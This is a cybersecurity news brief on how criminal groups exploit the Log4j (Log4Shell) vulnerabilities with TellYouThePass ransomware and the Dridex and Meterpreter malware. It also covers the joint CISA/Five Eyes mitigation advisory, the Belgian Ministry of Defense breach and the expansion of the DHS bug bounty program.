Criminal organizations continue to make hay of the Log4j vulnerabilities. The latest campaign to surface, Venture Beat reports, is using TellYouThePass, an older strain of ransomware that's been seen used mostly against Chinese targets, and that had been relatively inactive until Log4shell gave it fresh impetus. It now joints Khonsari and Conti.
Banking Trojans are also joining ransomware in the criminal exploitation of Log4shell. Cryptolaemus confirms seeing the Dridex banking Trojan delivered as the payload of a Log4j exploit. BleepingComputer reports that the familiar Dridex and Meterpreter malware strains have now been observed hitting vulnerable systems. Dridex, it's worth noting, has also served as a precursor to ransomware attacks.
CISA this morning announced, in conjunction with its domestic and international Five Eyes partners, Alert (AA21-356A) Mitigating Log4Shell and Other Log4j-Related Vulnerabilities:
"The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), the Computer Emergency Response Team New Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) are releasing this joint Cybersecurity Advisory (CSA) to provide mitigation guidance on addressing vulnerabilities in Apache’s Log4j software library: CVE-2021-44228 (known as “Log4Shell”), CVE-2021-45046, and CVE-2021-45105. Sophisticated cyber threat actors are actively scanning networks to potentially exploit Log4Shell, CVE-2021-45046, and CVE-2021-45105 in vulnerable systems. According to public reporting, Log4Shell and CVE-2021-45046 are being actively exploited."
The advice falls into three categories:
- "Identifying assets affected by Log4Shell and other Log4j-related vulnerabilities,
- "Upgrading Log4j assets and affected products to the latest version as soon as patches are available and remaining alert to vendor software updates, and
- "Initiating hunt and incident response procedures to detect possible Log4Shell exploitation."
The advice is comprehensive, specific yet brief enough to be readily actionable.
Belgium's Ministry of Defense continues to recover from its own experience with Log4shell. SC Magazine points out that, while that Ministry may be the first prominent government victim of Log4shell exploitation, such exploitation could reasonably be expected to be inevitable, and it's likely that more official bodies will be hit using such exploits.
The US Department of Homeland Security is taking the risk seriously. US Secretary of Homeland Security Mayorkas tweeted his Department's expansion of its bug bounty program to include Log4j: "In response to the recently discovered log4j vulnerabilities, @DHSgov is expanding the scope of our new #HackDHS bug bounty program and including additional incentives to find and patch log4j-related vulnerabilities in our systems."